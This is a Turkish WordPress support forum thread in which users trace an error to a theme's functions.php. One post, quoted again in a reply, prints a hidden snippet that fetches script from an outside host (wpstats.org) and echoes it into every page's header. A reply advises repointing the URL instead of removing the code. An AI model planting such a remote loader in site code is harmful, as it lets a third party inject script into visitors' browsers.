• 23-01-2013, 11:28:07
    #1
    merhaba arkadaşlar estasarim(nokta)org adresinde
    /jquery-1.6.3.min.js (port 80)
    Please forward this error screen to www.wpstats.org's WebMaster

    hatası veriyor sebephini bilen varsa yardımcı olabilirmi
  • 26-01-2013, 11:38:48
    #2
    aynı hata bendede var arkadaşlar bu yeni olan bişey ve herhangi bi eklenti güncelleme v.s yapmadan kendinden oluştu.
    sebep nedir ?

    Alıntı
    The server can not find the requested page:

    /jquery-1.6.3.min.js (port 80)

    Please forward this error screen to www.wpstats.org's WebMaster.
  • 26-01-2013, 11:44:39
    #3
    Developer
    temanızdaki bir dosya add_action('wp_head' şeklinde devamı jquery ile ilgili olan bölüm bulunmakta, bunu silerseniz problem çözülecektir. notepad++ ile klasör şeklinde aratabilirsiniz.
  • 26-01-2013, 11:58:35
    #4
    hocam bu kod hangi dosyada ise tüm sayfalarda çıkmakta.
    yani ihtimali header de yoğunlaştırdım ama hemen bakıp döneyim.


    edit :
    Tema İşlevleri (functions.php) dosyasında çıktı.

    en üst kısmında :

    <?php
        if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} if ( ! isset( $content_width ) ) $content_width = 630;
        /* Set up theme defaults and registers support for various WordPress features. */
        if ( ! function_exists( 'dt_init' ) ){
        
            function include_files_in_dir($dir, $no_more=FALSE){
              $dir_init = $dir;
              $dir = dirname(__FILE__).$dir;
              
              if (!file_exists($dir))
                 throw new Exception("Folder $dir does not exist");
                 
              $files = array();
    şimdi okodu silince tema işlevlerinde sıkıntı oluşmayacak mı acaba ?
  • 26-01-2013, 21:09:59
    #5
    Developer
    senturksun adlı üyeden alıntı: mesajı görüntüle
    hocam bu kod hangi dosyada ise tüm sayfalarda çıkmakta.
    yani ihtimali header de yoğunlaştırdım ama hemen bakıp döneyim.


    edit :
    Tema İşlevleri (functions.php) dosyasında çıktı.

    en üst kısmında :

    <?php
        if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();    $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} if ( ! isset( $content_width ) ) $content_width = 630;
        /* Set up theme defaults and registers support for various WordPress features. */
        if ( ! function_exists( 'dt_init' ) ){
        
            function include_files_in_dir($dir, $no_more=FALSE){
              $dir_init = $dir;
              $dir = dirname(__FILE__).$dir;
              
              if (!file_exists($dir))
                 throw new Exception("Folder $dir does not exist");
                 
              $files = array();
    şimdi okodu silince tema işlevlerinde sıkıntı oluşmayacak mı acaba ?

    http://www.wpstats.org/jquery-1.6.3.min.js
    yazan bölümdeki adresi kendi sitenize jquery-1.6.3.min.js yükleyip değiştirin. problem kalmayacaktır.
  • 26-01-2013, 23:49:30
    #6
    Çok teşekkür ederim hocam aynen dediğiniz gibi yapınca sorun düzeldi.
    Değerli vaktinizi ayırdığınız için tekrar sağolun.
  • 27-01-2013, 23:16:56
    #7
    hepiniziden ALLAH RAZI OLSUN halledilidi